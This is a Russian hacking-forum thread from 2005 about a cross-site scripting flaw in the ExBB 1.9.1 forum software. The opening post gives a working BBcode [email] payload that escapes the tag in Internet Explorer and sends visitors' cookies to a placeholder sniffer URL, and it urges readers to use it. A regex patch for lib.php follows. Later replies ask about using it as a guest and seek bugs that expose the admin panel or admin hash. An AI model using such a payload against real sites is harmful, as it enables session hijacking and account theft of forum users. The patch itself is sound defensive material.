Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS ExBB 1.9.1 (https://forum.antichat.xyz/showthread.php?t=6038)

Kihamo 14.04.2005 01:47
XSS ExBB 1.9.1
 
Ахтунг!
Недавно в инете появилась инфа о xss в bbcode url, разрабочтик исправил ошибку, но как оказалось не везде =)
И так поехали. Сразу предупрежу, что данная бага работает только в Internet Explorer :(. Суть состоит в том, что одна из форм записи bbcode email пропускает нужные нам символы, что позволяет выйти за пределы тега. Вот пример XSS
Код:
[ email]'style='display:none;background:url(javascript:document.images[2].src="http://you_sniffer_url/sniffer.php?"+document.cookie)[/email]
Думаю, что где и как все это работает объяснять не надо. Так что дерзайте =)
А теперь инфа добропорядочным юзерам. Раз разработчик думать не хочет, бум думать за него =)
Открываем файл lib.php и в примерно в 588 строке находим такой код
Код:
$post = preg_replace( "#\[email\](\S+?)\[/email\]#i", "<a href='mailto:\\1'>\\1</a>", $post );
и заменяем его на
Код:
$post = preg_replace( "#\[email\]([a-z0-9&\-_.]+?@[\w\-]+\.([\w\-\.]+\.)?[\w]+)\[/email\]#i", "<a href='mailto:\\1'>\\1</a>", $post );
За сим усе.

BNF 25.04.2005 02:40
а если от гостя вставлять этот код то должно работать?

White Jordan 25.04.2005 04:35
На этом форуме только полный идиот багу найти не сможет. :rolleyes:

rsha1988 25.04.2005 15:03
Цитата:
Сообщение от White Jordan
На этом форуме только полный идиот багу найти не сможет. :rolleyes:
хм, ну тогда если ты самый умный то найди багу через которую можно залезть в админ панель или получить хеш админа (разумееться чтоб бага работала на форуме в который админ просто не заходит)...

KEZ 25.04.2005 19:18
White Jordan какие проблемы? Почему ты не нашел багу и не выложил ее, не сделал видео? ты хуже идиота?

salikin 04.05.2005 11:03
мля, не работает!


Время: 23:40